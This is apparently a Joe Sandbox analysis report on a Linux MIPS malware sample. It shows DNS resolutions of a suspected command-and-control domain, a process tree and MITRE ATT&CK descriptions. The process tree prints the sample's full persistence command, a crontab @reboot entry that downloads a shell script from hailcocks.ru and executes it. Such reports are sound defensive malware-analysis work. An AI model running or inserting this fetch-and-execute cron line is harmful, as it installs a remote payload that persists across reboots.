Oct 26, 2024 19:02:38.048377037 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.048377037 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.048377037 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.048377037 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.048377037 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.062007904 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.062007904 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.062007904 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.062007904 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.062007904 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.062007904 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.062007904 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.062007904 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.062007904 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.062007904 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:38.062007904 CEST	51.158.108.203	192.168.2.23	0x38de	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.449693918 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.449693918 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.449693918 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.449693918 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.449693918 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.449693918 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.449693918 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.449693918 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.449693918 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.449693918 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.449693918 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.460385084 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.460385084 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.460385084 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.460385084 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.460385084 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.460385084 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.460385084 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.460385084 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.460385084 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.460385084 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:44.460385084 CEST	80.152.203.134	192.168.2.23	0xa187	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:55.385015965 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:55.385015965 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:55.385015965 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:55.385015965 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:55.385015965 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:55.385015965 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:55.385015965 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:55.385015965 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:55.385015965 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:55.385015965 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:55.385015965 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:57.432312012 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:57.432312012 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:57.432312012 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:57.432312012 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:57.432312012 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:57.432312012 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:57.432312012 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:57.432312012 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:57.432312012 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:57.432312012 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:02:57.432312012 CEST	81.169.136.222	192.168.2.23	0xd616	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:01.375931978 CEST	217.160.70.42	192.168.2.23	0x731c	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:01.375931978 CEST	217.160.70.42	192.168.2.23	0x731c	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:01.375931978 CEST	217.160.70.42	192.168.2.23	0x731c	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:01.375931978 CEST	217.160.70.42	192.168.2.23	0x731c	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:01.375931978 CEST	217.160.70.42	192.168.2.23	0x731c	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:01.375931978 CEST	217.160.70.42	192.168.2.23	0x731c	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:01.375931978 CEST	217.160.70.42	192.168.2.23	0x731c	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:01.375931978 CEST	217.160.70.42	192.168.2.23	0x731c	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:01.375931978 CEST	217.160.70.42	192.168.2.23	0x731c	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:01.375931978 CEST	217.160.70.42	192.168.2.23	0x731c	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:01.375931978 CEST	217.160.70.42	192.168.2.23	0x731c	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:22.337086916 CEST	217.160.70.42	192.168.2.23	0x98e4	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:22.337086916 CEST	217.160.70.42	192.168.2.23	0x98e4	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:22.337086916 CEST	217.160.70.42	192.168.2.23	0x98e4	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:22.337086916 CEST	217.160.70.42	192.168.2.23	0x98e4	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:22.337086916 CEST	217.160.70.42	192.168.2.23	0x98e4	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:22.337086916 CEST	217.160.70.42	192.168.2.23	0x98e4	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:22.337086916 CEST	217.160.70.42	192.168.2.23	0x98e4	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:22.337086916 CEST	217.160.70.42	192.168.2.23	0x98e4	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:22.337086916 CEST	217.160.70.42	192.168.2.23	0x98e4	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:22.337086916 CEST	217.160.70.42	192.168.2.23	0x98e4	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:03:22.337086916 CEST	217.160.70.42	192.168.2.23	0x98e4	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: mips.elf PID: 6238, Parent PID: 6158

General

Start time (UTC):	17:02:16
Start date (UTC):	26/10/2024
Path:	/tmp/mips.elf
Arguments:	/tmp/mips.elf
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: mips.elf PID: 6240, Parent PID: 6238

General

Start time (UTC):	17:02:16
Start date (UTC):	26/10/2024
Path:	/tmp/mips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: sh PID: 6240, Parent PID: 6238

General

Start time (UTC):	17:02:16
Start date (UTC):	26/10/2024
Path:	/bin/sh
Arguments:	sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6242, Parent PID: 6240

General

Start time (UTC):	17:02:16
Start date (UTC):	26/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6244, Parent PID: 6242

General

Start time (UTC):	17:02:16
Start date (UTC):	26/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 6244, Parent PID: 6242

General

Start time (UTC):	17:02:16
Start date (UTC):	26/10/2024
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 6243, Parent PID: 6240

General

Start time (UTC):	17:02:16
Start date (UTC):	26/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 6243, Parent PID: 6240

General

Start time (UTC):	17:02:16
Start date (UTC):	26/10/2024
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: mips.elf PID: 6245, Parent PID: 6238

General

Start time (UTC):	17:02:16
Start date (UTC):	26/10/2024
Path:	/tmp/mips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: mips.elf PID: 6309, Parent PID: 6245

General

Start time (UTC):	17:02:17
Start date (UTC):	26/10/2024
Path:	/tmp/mips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: mips.elf PID: 6311, Parent PID: 6245

General

Start time (UTC):	17:02:17
Start date (UTC):	26/10/2024
Path:	/tmp/mips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: mips.elf PID: 6247, Parent PID: 6238

General

Start time (UTC):	17:02:16
Start date (UTC):	26/10/2024
Path:	/tmp/mips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: mips.elf PID: 6262, Parent PID: 6238

General

Start time (UTC):	17:02:16
Start date (UTC):	26/10/2024
Path:	/tmp/mips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report mips.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/var/spool/cron/crontabs/tmp.fI62Ih

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: mips.elf PID: 6238, Parent PID: 6158

General

Chronological Activities

Analysis Process: mips.elf PID: 6240, Parent PID: 6238

General

Chronological Activities

Analysis Process: sh PID: 6240, Parent PID: 6238

General

Chronological Activities

Analysis Process: sh PID: 6242, Parent PID: 6240

General

Chronological Activities

Analysis Process: sh PID: 6244, Parent PID: 6242

General

Chronological Activities

Analysis Process: crontab PID: 6244, Parent PID: 6242

General

Chronological Activities

Analysis Process: sh PID: 6243, Parent PID: 6240

General

Linux Analysis Report
mips.elf